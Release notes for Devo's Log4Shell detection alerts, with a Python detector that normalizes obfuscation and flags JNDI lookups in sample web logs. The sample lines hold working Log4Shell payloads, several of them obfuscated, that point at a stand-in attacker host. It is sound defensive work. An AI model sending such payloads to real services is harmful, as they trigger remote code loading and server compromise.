
Log4Shell detection release notes

This document contains the release notes for the detections that Devo has released to identify whether your organization is being actively probed for susceptibility to log4j (Log4Shell) exploitation.

Figure: The log4j JNDI attack

Image credit: Swiss Government Computer Emergency Response Team (GovCERT)

Data Source

Domains All (union table: data from DNS, Proxy, Web, IDS, and many other sources)

Affected Columns

raw

Alert Description

Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies.

Mitre Tactic

Initial Access

TA0001

Mitre Technique 

Exploit Public-Facing Application

T1190


Data Source

Web

Affected Columns

raw

Alert Description

Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies.

Mitre Tactic

Initial Access

TA0001

Mitre Technique 

Exploit Public-Facing Application

T1190


Data Source

Proxy

Affected Columns

raw

Alert Description

Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies.

Mitre Tactic

Initial Access

TA0001

Mitre Technique

Exploit Public-Facing Application

T1190


Data Source

Cloud AWS

Affected Columns

raw

Alert Description

Alert that detects attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message, including payloads carried in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies.

Mitre Tactic

Initial Access

TA0001

Mitre Technique

Exploit Public-Facing Application

T1190
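All four detections above describe the same approach: a pattern match for the JNDI lookup payload on the raw log message, wherever in the request it lands. The Python below is an added example, not Devo's own query or code (the page does not reproduce the production query). It runs that detection logic over constructed sample log lines and goes one step beyond the description by unwrapping the common obfuscations (URL encoding, `${lower:}`/`${upper:}` wrappers and `${::-x}`-style default lookups) that a literal `${jndi:` match would miss. The log lines, the `attacker.example` host and the function names are assumptions made for illustration.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed sample log lines in a combined-access-log style (not real Devo data).
# Line 0 is benign. Lines 1-4 carry a Log4Shell probe in, respectively, the URL query
# string, the User-Agent header, the Referer header and a URL-encoded POST body.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "${jndi:${::-l}${::-d}${::-a}${::-p}://attacker.example/c}" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "POST /api/login HTTP/1.1" 200 12 "-" "python-requests/2.26" body=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D',
]

# Lookup wrappers that attackers nest around "jndi" to defeat literal matching.
# Both patterns exclude "$", "{" and "}" from the inner text, so the innermost wrapper
# is rewritten first; repeated rounds in normalize() then peel the outer ones.
_CASE_WRAP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}")  # ${lower:j} -> j
_DEFAULT_WRAP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")              # ${::-j}, ${env:NOPE:-j} -> j
# The lookup the alert is really after, with the scheme captured when one is present.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?")


def normalize(raw: str, max_rounds: int = 10) -> str:
    """Undo one layer of URL encoding and wrapper obfuscation per round until nothing changes."""
    text = raw
    for _ in range(max_rounds):
        before = text
        text = unquote(text).lower()          # peel one %xx layer, then case-fold
        text = _CASE_WRAP.sub(r"\1", text)    # ${lower:x} / ${upper:x} -> x
        text = _DEFAULT_WRAP.sub(r"\1", text) # ${<anything>:-x} -> x
        if text == before:
            break
    return text


def find_log4shell(raw: str) -> List[Tuple[str, str]]:
    """Return (scheme, normalized payload) for every JNDI lookup found in one raw log line."""
    text = normalize(raw)
    hits = []
    for m in _JNDI.finditer(text):
        close = text.find("}", m.start())     # payload runs to its closing brace, or to end of line if truncated
        payload = text[m.start():close + 1] if close != -1 else text[m.start():]
        hits.append((m.group(1) or "unknown", payload))
    return hits


def scan_logs(lines: List[str]) -> Dict[int, List[Tuple[str, str]]]:
    """Map line index -> hits for every line that carries a probe, i.e. the alert's trigger set."""
    flagged = {}
    for i, line in enumerate(lines):
        hits = find_log4shell(line)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for i, hits in scan_logs(SAMPLE_LOGS).items():
        for scheme, payload in hits:
            print(f"line {i}: scheme={scheme} payload={payload}")
```

Note what a hit means: a JNDI lookup string reached a logged request field, so the organization was probed. It does not show that the receiving application runs a vulnerable Log4j 2 version or that the lookup was actually resolved; corroborating that needs evidence of the server's own outbound LDAP, RMI or DNS connection, for instance in the DNS or proxy data that the union table above also covers. Normalizing before matching is what keeps the obfuscated variants in the sample from slipping past, but an attacker can always add another layer, so treat the pattern list as something to keep extending rather than as complete.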